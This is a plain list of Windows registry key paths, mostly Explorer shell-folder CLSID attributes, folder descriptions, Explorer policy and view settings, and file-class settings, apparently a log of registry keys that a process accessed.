HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{DAF95313-E44D-46AF-BE1B-CBACEA2C3065}\ShellFolder\UseDropHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{DAF95313-E44D-46AF-BE1B-CBACEA2C3065}\ShellFolder\WantsFORPARSING
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{DAF95313-E44D-46AF-BE1B-CBACEA2C3065}\ShellFolder\WantsParseDisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{DAF95313-E44D-46AF-BE1B-CBACEA2C3065}\ShellFolder\QueryForOverlay
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{DAF95313-E44D-46AF-BE1B-CBACEA2C3065}\ShellFolder\MapNetDriveVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{DAF95313-E44D-46AF-BE1B-CBACEA2C3065}\ShellFolder\QueryForInfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{DAF95313-E44D-46AF-BE1B-CBACEA2C3065}\ShellFolder\HideInWebView
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{DAF95313-E44D-46AF-BE1B-CBACEA2C3065}\ShellFolder\HideOnDesktopPerUser
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{DAF95313-E44D-46AF-BE1B-CBACEA2C3065}\ShellFolder\WantsAliasedNotifications
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{DAF95313-E44D-46AF-BE1B-CBACEA2C3065}\ShellFolder\WantsUniversalDelegate
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{DAF95313-E44D-46AF-BE1B-CBACEA2C3065}\ShellFolder\NoFileFolderJunction
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{DAF95313-E44D-46AF-BE1B-CBACEA2C3065}\ShellFolder\PinToNameSpaceTree
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{DAF95313-E44D-46AF-BE1B-CBACEA2C3065}\ShellFolder\HasNavigationEnum
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\NonEnum\{DAF95313-E44D-46AF-BE1B-CBACEA2C3065}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{E345F35F-9397-435C-8F95-4E922C26259E}\ShellFolder\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{E345F35F-9397-435C-8F95-4E922C26259E}\ShellFolder\CallForAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{E345F35F-9397-435C-8F95-4E922C26259E}\ShellFolder\RestrictedAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{E345F35F-9397-435C-8F95-4E922C26259E}\ShellFolder\WantsFORDISPLAY
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{E345F35F-9397-435C-8F95-4E922C26259E}\ShellFolder\HideFolderVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{E345F35F-9397-435C-8F95-4E922C26259E}\ShellFolder\UseDropHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{E345F35F-9397-435C-8F95-4E922C26259E}\ShellFolder\WantsFORPARSING
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{E345F35F-9397-435C-8F95-4E922C26259E}\ShellFolder\WantsParseDisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{E345F35F-9397-435C-8F95-4E922C26259E}\ShellFolder\QueryForOverlay
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{E345F35F-9397-435C-8F95-4E922C26259E}\ShellFolder\MapNetDriveVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{E345F35F-9397-435C-8F95-4E922C26259E}\ShellFolder\QueryForInfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{E345F35F-9397-435C-8F95-4E922C26259E}\ShellFolder\HideInWebView
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{E345F35F-9397-435C-8F95-4E922C26259E}\ShellFolder\HideOnDesktopPerUser
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{E345F35F-9397-435C-8F95-4E922C26259E}\ShellFolder\WantsAliasedNotifications
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{E345F35F-9397-435C-8F95-4E922C26259E}\ShellFolder\WantsUniversalDelegate
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{E345F35F-9397-435C-8F95-4E922C26259E}\ShellFolder\NoFileFolderJunction
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{E345F35F-9397-435C-8F95-4E922C26259E}\ShellFolder\PinToNameSpaceTree
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{E345F35F-9397-435C-8F95-4E922C26259E}\ShellFolder\HasNavigationEnum
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\NonEnum\{E345F35F-9397-435C-8F95-4E922C26259E}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{ED228FDF-9EA8-4870-83B1-96B02CFE0D52}\ShellFolder\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{ED228FDF-9EA8-4870-83B1-96B02CFE0D52}\ShellFolder\CallForAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{ED228FDF-9EA8-4870-83B1-96B02CFE0D52}\ShellFolder\RestrictedAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{ED228FDF-9EA8-4870-83B1-96B02CFE0D52}\ShellFolder\WantsFORDISPLAY
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{ED228FDF-9EA8-4870-83B1-96B02CFE0D52}\ShellFolder\HideFolderVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{ED228FDF-9EA8-4870-83B1-96B02CFE0D52}\ShellFolder\UseDropHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{ED228FDF-9EA8-4870-83B1-96B02CFE0D52}\ShellFolder\WantsFORPARSING
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{ED228FDF-9EA8-4870-83B1-96B02CFE0D52}\ShellFolder\WantsParseDisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{ED228FDF-9EA8-4870-83B1-96B02CFE0D52}\ShellFolder\QueryForOverlay
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{ED228FDF-9EA8-4870-83B1-96B02CFE0D52}\ShellFolder\MapNetDriveVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{ED228FDF-9EA8-4870-83B1-96B02CFE0D52}\ShellFolder\QueryForInfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{ED228FDF-9EA8-4870-83B1-96B02CFE0D52}\ShellFolder\HideInWebView
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{ED228FDF-9EA8-4870-83B1-96B02CFE0D52}\ShellFolder\HideOnDesktopPerUser
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{ED228FDF-9EA8-4870-83B1-96B02CFE0D52}\ShellFolder\WantsAliasedNotifications
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{ED228FDF-9EA8-4870-83B1-96B02CFE0D52}\ShellFolder\WantsUniversalDelegate
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{ED228FDF-9EA8-4870-83B1-96B02CFE0D52}\ShellFolder\NoFileFolderJunction
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{ED228FDF-9EA8-4870-83B1-96B02CFE0D52}\ShellFolder\PinToNameSpaceTree
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{ED228FDF-9EA8-4870-83B1-96B02CFE0D52}\ShellFolder\HasNavigationEnum
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\NonEnum\{ED228FDF-9EA8-4870-83B1-96B02CFE0D52}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{F02C1A0D-BE21-4350-88B0-7367FC96EF3C}\ShellFolder\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{F02C1A0D-BE21-4350-88B0-7367FC96EF3C}\ShellFolder\CallForAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{F02C1A0D-BE21-4350-88B0-7367FC96EF3C}\ShellFolder\RestrictedAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{F02C1A0D-BE21-4350-88B0-7367FC96EF3C}\ShellFolder\WantsFORDISPLAY
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{F02C1A0D-BE21-4350-88B0-7367FC96EF3C}\ShellFolder\HideFolderVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{F02C1A0D-BE21-4350-88B0-7367FC96EF3C}\ShellFolder\UseDropHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{F02C1A0D-BE21-4350-88B0-7367FC96EF3C}\ShellFolder\WantsFORPARSING
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{F02C1A0D-BE21-4350-88B0-7367FC96EF3C}\ShellFolder\WantsParseDisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{F02C1A0D-BE21-4350-88B0-7367FC96EF3C}\ShellFolder\QueryForOverlay
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{F02C1A0D-BE21-4350-88B0-7367FC96EF3C}\ShellFolder\MapNetDriveVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{F02C1A0D-BE21-4350-88B0-7367FC96EF3C}\ShellFolder\QueryForInfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{F02C1A0D-BE21-4350-88B0-7367FC96EF3C}\ShellFolder\HideInWebView
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{F02C1A0D-BE21-4350-88B0-7367FC96EF3C}\ShellFolder\HideOnDesktopPerUser
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{F02C1A0D-BE21-4350-88B0-7367FC96EF3C}\ShellFolder\WantsAliasedNotifications
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{F02C1A0D-BE21-4350-88B0-7367FC96EF3C}\ShellFolder\WantsUniversalDelegate
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{F02C1A0D-BE21-4350-88B0-7367FC96EF3C}\ShellFolder\NoFileFolderJunction
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{F02C1A0D-BE21-4350-88B0-7367FC96EF3C}\ShellFolder\PinToNameSpaceTree
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{F02C1A0D-BE21-4350-88B0-7367FC96EF3C}\ShellFolder\HasNavigationEnum
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\NonEnum\{F02C1A0D-BE21-4350-88B0-7367FC96EF3C}
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{5e1375cd-b5ba-11e3-a2f5-806e6f6e6963}\Data
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{5e1375cd-b5ba-11e3-a2f5-806e6f6e6963}\Generation
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Drive\shellex\FolderExtensions\{fbeb8a05-beee-4442-804e-409d6c4515e9}\DriveMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DontShowSuperHidden
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellState
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoWebView
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\ClassicShell
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\SeparateProcess
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoNetCrawling
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSimpleStartMenu
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowCompColor
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\DontPrettyPath
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowInfoTip
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideIcons
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\MapNetDrvBtn
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\WebView
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Filter
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\SeparateProcess
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\NoNetCrawling
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\AutoCheckSelect
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\IconsOnly
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowTypeOverlay
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Directory\DocObject
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Folder\DocObject
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\DocObject
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Directory\BrowseInPlace
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Folder\BrowseInPlace
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\BrowseInPlace
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Directory\IsShortcut
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Folder\IsShortcut
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\IsShortcut
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Directory\AlwaysShowExt
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Directory\NeverShowExt
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Folder\NeverShowExt
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\NeverShowExt
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{3abfb8f2-2ffd-11e7-a4cf-806e6f6e6963}\Data
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{3abfb8f2-2ffd-11e7-a4cf-806e6f6e6963}\Generation
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{5e1375cc-b5ba-11e3-a2f5-806e6f6e6963}\Data
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{5e1375cc-b5ba-11e3-a2f5-806e6f6e6963}\Generation
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\AllowFileCLSIDJunctions
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.exe\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\DocObject
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.exe\DocObject
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\BrowseInPlace
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.exe\BrowseInPlace
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.exe\Content Type
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\IsShortcut
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.exe\IsShortcut
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\AlwaysShowExt
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.exe\AlwaysShowExt
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\NeverShowExt
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.exe\NeverShowExt
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\Category
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\Name
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\ParentFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\Description
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\RelativePath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\ParsingName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\InfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\LocalizedName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\Icon
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\Security
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\StreamResource
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\StreamResourceType
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\LocalRedirectOnly
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\Roamable
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\PreCreate
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\Stream
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\PublishExpandedPath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\FolderTypeID
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\InitFolderHandler
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\Desktop
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\AccessProviders\MartaExtension
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\Category
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\Name
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\ParentFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\Description
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\RelativePath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\ParsingName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\InfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\LocalizedName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\Icon
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\Security
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\StreamResource
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\StreamResourceType
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\LocalRedirectOnly
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\Roamable
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\PreCreate
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\Stream
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\PublishExpandedPath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\FolderTypeID
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\InitFolderHandler
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\Category
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\Name
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\ParentFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\Description
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\RelativePath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\ParsingName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\InfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\LocalizedName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\Icon
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\Security
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\StreamResource
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\StreamResourceType
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\LocalRedirectOnly
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\Roamable
